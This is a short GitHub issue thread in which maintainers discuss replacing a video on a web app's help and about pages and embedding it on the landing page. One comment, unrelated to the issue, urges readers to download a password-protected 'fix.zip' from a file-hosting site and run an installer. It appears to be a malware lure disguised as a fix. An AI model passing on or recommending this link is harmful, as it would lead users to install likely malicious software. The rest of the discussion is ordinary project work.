### ISSUE TITLE
Update video + embed on front page

### ISSUE THREAD

**Issue by yoavartzi** [lil-lab/recnet#251]
Replace the video on the help and about pages with:
https://youtu.be/Sl7CKRwcX1s

And also embed on the front page under the current content

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swh00tw** [comment]
Done

**Comment by yoavartzi** [comment]
Can you also embed it on the front page?

**Comment by swh00tw** [comment]
I can do that but if we do that, the video will be appear three times in our app (`/about`, `/help`, and landing page), which I feel like it's a little bit too much. What do you think?

**Comment by yoavartzi** [comment]
Yes. I created #265  to fix this
